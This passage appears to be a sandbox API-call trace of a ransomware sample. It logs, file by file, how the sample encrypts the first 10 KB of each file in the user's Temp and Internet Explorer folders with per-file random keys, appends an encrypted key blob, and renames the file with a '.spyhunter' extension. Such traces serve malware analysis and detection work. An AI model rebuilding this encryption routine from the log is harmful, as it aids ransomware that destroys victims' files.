(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\oyyoy3r1o1sz23.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\oyyOY3R1O1Sz23.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\oyyoy3r1o1sz23.swf.spyhunter")) returned 1 [0139.438] GetProcessHeap () returned 0x2c0000 [0139.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.438] GetProcessHeap () returned 0x2c0000 [0139.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.438] GetProcessHeap () returned 0x2c0000 [0139.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c80e80 | out: hHeap=0x2c0000) returned 1 [0139.438] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f110 | out: pbBuffer=0x270f110) returned 1 [0139.438] GetProcessHeap () returned 0x2c0000 [0139.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.438] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270f108*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270f108*=0x30) returned 1 [0139.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\No7dkAD_AFWMXkw65.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\no7dkad_afwmxkw65.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.439] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\No7dkAD_AFWMXkw65.mkv") returned 74 [0139.439] StrStrW (lpFirst="No7dkAD_AFWMXkw65.mkv", lpSrch=".txt") returned 0x0 [0139.439] GetProcessHeap () returned 0x2c0000 [0139.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.439] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f0cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f0cc*=0x2800, lpOverlapped=0x0) returned 1 [0139.440] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.440] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f0cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f0cc*=0x2800, lpOverlapped=0x0) returned 1 [0139.440] GetProcessHeap () returned 0x2c0000 [0139.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.440] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.441] WriteFile (in: hFile=0xb4, lpBuffer=0x270f10c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f0cc, lpOverlapped=0x0 | out: lpBuffer=0x270f10c*, lpNumberOfBytesWritten=0x270f0cc*=0x4, lpOverlapped=0x0) returned 1 [0139.441] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f0cc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270f0cc*=0x30, lpOverlapped=0x0) returned 1 [0139.441] CloseHandle (hObject=0xb4) returned 1 [0139.441] GetProcessHeap () returned 0x2c0000 [0139.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.441] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\No7dkAD_AFWMXkw65.mkv.spyhunter") returned 84 [0139.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\No7dkAD_AFWMXkw65.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\no7dkad_afwmxkw65.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\No7dkAD_AFWMXkw65.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\no7dkad_afwmxkw65.mkv.spyhunter")) returned 1 [0139.442] GetProcessHeap () returned 0x2c0000 [0139.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.442] GetProcessHeap () returned 0x2c0000 [0139.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.442] GetProcessHeap () returned 0x2c0000 [0139.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb4f58 | out: hHeap=0x2c0000) returned 1 [0139.443] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f108 | out: pbBuffer=0x270f108) returned 1 [0139.443] GetProcessHeap () returned 0x2c0000 [0139.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.443] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270f100*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270f100*=0x30) returned 1 [0139.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\MptrL2V.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\mptrl2v.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.443] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\MptrL2V.odp") returned 64 [0139.443] StrStrW (lpFirst="MptrL2V.odp", lpSrch=".txt") returned 0x0 [0139.443] GetProcessHeap () returned 0x2c0000 [0139.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.443] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f0c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f0c4*=0x2800, lpOverlapped=0x0) returned 1 [0139.444] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.444] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f0c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f0c4*=0x2800, lpOverlapped=0x0) returned 1 [0139.444] GetProcessHeap () returned 0x2c0000 [0139.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.445] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.445] WriteFile (in: hFile=0xb4, lpBuffer=0x270f104*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f0c4, lpOverlapped=0x0 | out: lpBuffer=0x270f104*, lpNumberOfBytesWritten=0x270f0c4*=0x4, lpOverlapped=0x0) returned 1 [0139.445] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f0c4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270f0c4*=0x30, lpOverlapped=0x0) returned 1 [0139.445] CloseHandle (hObject=0xb4) returned 1 [0139.445] GetProcessHeap () returned 0x2c0000 [0139.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0139.445] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\MptrL2V.odp.spyhunter") returned 74 [0139.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\MptrL2V.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\mptrl2v.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\MptrL2V.odp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\mptrl2v.odp.spyhunter")) returned 1 [0139.468] GetProcessHeap () returned 0x2c0000 [0139.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0139.468] GetProcessHeap () returned 0x2c0000 [0139.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.468] GetProcessHeap () returned 0x2c0000 [0139.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e087b8 | out: hHeap=0x2c0000) returned 1 [0139.470] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f100 | out: pbBuffer=0x270f100) returned 1 [0139.470] GetProcessHeap () returned 0x2c0000 [0139.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.470] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270f0f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270f0f8*=0x30) returned 1 [0139.470] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.471] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat") returned 82 [0139.471] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0139.471] GetProcessHeap () returned 0x2c0000 [0139.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.471] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f0bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f0bc*=0x2800, lpOverlapped=0x0) returned 1 [0139.619] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.620] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f0bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f0bc*=0x2800, lpOverlapped=0x0) returned 1 [0139.620] GetProcessHeap () returned 0x2c0000 [0139.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.620] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.620] WriteFile (in: hFile=0xb4, lpBuffer=0x270f0fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f0bc, lpOverlapped=0x0 | out: lpBuffer=0x270f0fc*, lpNumberOfBytesWritten=0x270f0bc*=0x4, lpOverlapped=0x0) returned 1 [0139.620] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f0bc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270f0bc*=0x30, lpOverlapped=0x0) returned 1 [0139.620] CloseHandle (hObject=0xb4) returned 1 [0139.620] GetProcessHeap () returned 0x2c0000 [0139.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0139.620] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat.spyhunter") returned 92 [0139.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\index.dat.spyhunter")) returned 1 [0139.621] GetProcessHeap () returned 0x2c0000 [0139.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0139.621] GetProcessHeap () returned 0x2c0000 [0139.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.621] GetProcessHeap () returned 0x2c0000 [0139.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8e098 | out: hHeap=0x2c0000) returned 1 [0139.625] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f0f0 | out: pbBuffer=0x270f0f0) returned 1 [0139.625] GetProcessHeap () returned 0x2c0000 [0139.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.625] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270f0e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270f0e8*=0x30) returned 1 [0139.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0139.626] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini") returned 84 [0139.626] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0139.626] GetProcessHeap () returned 0x2c0000 [0139.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0139.626] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f0ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f0ac*=0x91, lpOverlapped=0x0) returned 1 [0139.627] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.627] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x270f0ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f0ac*=0x91, lpOverlapped=0x0) returned 1 [0139.627] GetProcessHeap () returned 0x2c0000 [0139.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0139.627] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.627] WriteFile (in: hFile=0xb4, lpBuffer=0x270f0ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f0ac, lpOverlapped=0x0 | out: lpBuffer=0x270f0ec*, lpNumberOfBytesWritten=0x270f0ac*=0x4, lpOverlapped=0x0) returned 1 [0139.627] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f0ac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270f0ac*=0x30, lpOverlapped=0x0) returned 1 [0139.627] CloseHandle (hObject=0xb4) returned 1 [0139.627] GetProcessHeap () returned 0x2c0000 [0139.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0139.627] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini.spyhunter") returned 94 [0139.627] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\History\\History.IE5\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\history\\history.ie5\\desktop.ini.spyhunter")) returned 1 [0139.918] GetProcessHeap () returned 0x2c0000 [0139.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0139.919] GetProcessHeap () returned 0x2c0000 [0139.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.919] GetProcessHeap () returned 0x2c0000 [0139.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f399e8 | out: hHeap=0x2c0000) returned 1 [0140.033] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f0e0 | out: pbBuffer=0x270f0e0) returned 1 [0140.033] GetProcessHeap () returned 0x2c0000 [0140.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.033] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f0d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f0d8*=0x30) returned 1 [0140.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.034] GetProcessHeap () returned 0x2c0000 [0140.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.034] GetProcessHeap () returned 0x2c0000 [0140.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68588 | out: hHeap=0x2c0000) returned 1 [0140.034] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f0e0 | out: pbBuffer=0x270f0e0) returned 1 [0140.034] GetProcessHeap () returned 0x2c0000 [0140.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.034] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f0d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f0d8*=0x30) returned 1 [0140.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\DZBKZBIC\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\dzbkzbic\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.034] GetProcessHeap () returned 0x2c0000 [0140.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.034] GetProcessHeap () returned 0x2c0000 [0140.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68470 | out: hHeap=0x2c0000) returned 1 [0140.035] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f0d8 | out: pbBuffer=0x270f0d8) returned 1 [0140.035] GetProcessHeap () returned 0x2c0000 [0140.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.035] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f0d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f0d0*=0x30) returned 1 [0140.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.035] GetProcessHeap () returned 0x2c0000 [0140.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.035] GetProcessHeap () returned 0x2c0000 [0140.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68358 | out: hHeap=0x2c0000) returned 1 [0140.036] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f0d0 | out: pbBuffer=0x270f0d0) returned 1 [0140.036] GetProcessHeap () returned 0x2c0000 [0140.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.036] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f0c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f0c8*=0x30) returned 1 [0140.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ay721qdr\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.036] GetProcessHeap () returned 0x2c0000 [0140.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.036] GetProcessHeap () returned 0x2c0000 [0140.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68240 | out: hHeap=0x2c0000) returned 1 [0140.037] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f0c8 | out: pbBuffer=0x270f0c8) returned 1 [0140.037] GetProcessHeap () returned 0x2c0000 [0140.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.038] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f0c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f0c0*=0x30) returned 1 [0140.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.038] GetProcessHeap () returned 0x2c0000 [0140.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.038] GetProcessHeap () returned 0x2c0000 [0140.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68128 | out: hHeap=0x2c0000) returned 1 [0140.038] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f0c8 | out: pbBuffer=0x270f0c8) returned 1 [0140.038] GetProcessHeap () returned 0x2c0000 [0140.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.038] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f0c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f0c0*=0x30) returned 1 [0140.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\65ux3yg0\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.039] GetProcessHeap () returned 0x2c0000 [0140.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0140.039] GetProcessHeap () returned 0x2c0000 [0140.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68010 | out: hHeap=0x2c0000) returned 1 [0140.039] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f0c0 | out: pbBuffer=0x270f0c0) returned 1 [0140.039] GetProcessHeap () returned 0x2c0000 [0140.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0140.039] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f0b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f0b8*=0x30) returned 1 